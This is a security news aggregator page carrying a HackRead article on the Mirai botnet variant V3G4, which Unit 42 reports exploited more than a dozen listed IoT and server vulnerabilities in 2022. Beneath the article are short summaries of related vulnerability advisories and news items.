Security
Headlines
HeadlinesLatestCVEs

Headline

Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

By Waqas The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com Read the original post: Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

HackRead
#vulnerability#web#android#ddos#dos#git#rce#botnet

Like the original Mirai botnet, V3G4 infects IoT devices by exploiting default data login credentials such as usernames and passwords.

The IT security researchers at Palo Alto Networks’ Unit 42 have identified a new variant of the infamous Mirai malware, which was responsible for several large-scale DDoS attacks (Distributed Denial of Service attacks) on Dyn DNS in October 2016.

Dubbed V3G4 by researchers, it is a type of malware that specifically targets Internet of Things (IoT) devices. Like the original Mirai botnet, V3G4 infects IoT devices by exploiting default data login credentials such as usernames and passwords.

In the campaign tracked by Unit 42, one of the prime targets of the V3G4 malware has been exposed IP cameras. The malware uses the exposed servers and devices to create a powerful botnet, which can be used to launch DDoS attacks or perform other malicious activities, such as stealing data or installing additional malware.

According to Unit 42’s report, researchers observed the V3G4 malware leveraging several vulnerabilities to spread its infection from July to December of 2022. These vulnerabilities include the following:

CVE-2019-15107

Webmin Command Injection Vulnerability

CVE-2012-4869

FreePBX Elastix Remote Command Execution Vulnerability

CVE-2020-8515

DrayTek Vigor Remote Command Execution Vulnerability

CVE-2020-15415

DrayTek Vigor Remote Command Injection Vulnerability

CVE-2022-36267

Airspan AirSpot Remote Command Execution Vulnerability

CVE-2022-26134

Atlassian Confluence Remote Code Execution Vulnerability

CVE-2022-4257

C-Data Web Management System Command Injection Vulnerability

CVE-2017-5173

Geutebruck IP Cameras Remote Command Execution Vulnerability

CVE-2014-9727

FRITZ!Box Webcam Remote Command Execution Vulnerability

Gitorious Remote Command Execution Vulnerability

Mitel AWC Remote Command Execution Vulnerability

Spree Commerce Arbitrary Command Execution Vulnerability

FLIR Thermal Camera Remote Command Execution Vulnerability

Source: Unit 42

Researchers also noted that within the botnet client, there is a stop list of process names that it endeavours to eliminate by cross-checking the names of currently running processes on the targeted host. These process names are associated with other botnet malware families and have previously identified different variants of Mirai.

V3G4’s stop list.

This should not come as a surprise, as there have been several Mirai variants that have surfaced over the years. Some of them included MooBot, Demonbot, OMG, and several others.

The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution.

Palo Alto Networks – Unit 42

To protect against V3G4 and other IoT malware, it is important to follow best practices for securing IoT devices. This includes changing default usernames and passwords, keeping software up to date with the latest security patches, and disabling unnecessary services and protocols. Network segmentation can also help to contain the spread of malware if a device is infected.

  1. Cloudflare thwarts the largest DDoS attack
  2. EV Charging Stations at Risk of DoS Attacks
  3. Tor Network Hit By a Series of DDoS Attacks
  4. Tiny Mantis DDoS attacks powerful than Mirai
  5. New malware targeting IoT devices, Android TV

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Related news

New Linux Malware Alert: ‘Spinning YARN’ Hits Docker, Other Key Apps

By Deeba Ahmed Another day, another Linux malware! This is a post from HackRead.com Read the original post: New Linux Malware Alert: ‘Spinning YARN’ Hits Docker, Other Key Apps

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

New Mirai Botnet Variant 'V3G4' Exploiting 13 Flaws to Target Linux and IoT Devices

A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they

CVE-2022-4257: VulnHub/rce1.md at main · siriuswhiter/VulnHub

A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.

AirSpot 5410 0.3.4.1-4 Remote Command Injection

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

CVE-2022-36267: Airspan-AirSpot-5410.md

In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners

A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads. In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner

Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity

A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks

DragonForce Gang Unleash Hacks Against Govt. of India

In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

“Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft

Microsoft has warned of APT groups and ransomware authors exploiting the now patched Confluence vulnerability. We take a look at the dangers. The post “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft appeared first on Malwarebytes Labs.

Confluence OGNL Injection Remote Code Execution

Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.

Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw

The vulnerability remains unpatched on many versions of the collaboration tool and has potential to create a SolarWinds-type scenario.

Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild

Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134, the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of

Threat Advisory: Atlassian Confluence zero-day vulnerability under active exploitation

Cisco Talos is monitoring reports of an actively exploited zero-day vulnerability in Confluence Data Center and Server. Confluence is a Java-based corporate Wiki employed by numerous enterprises. At this time, it is confirmed that all supported versions of Confluence are affected by this... [[ This is only the beginning! Please visit the blog for the complete entry ]]

Actively Exploited Atlassian Zero-Day Bug Allows Full System Takeover

An remote code execution (RCE) vulnerability in all versions of the popular Confluence collaboration platform can be abused in credential harvesting, cyber espionage, and network backdoor attacks.

Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability

Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134. "Atlassian has been made aware of current active exploitation of a

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.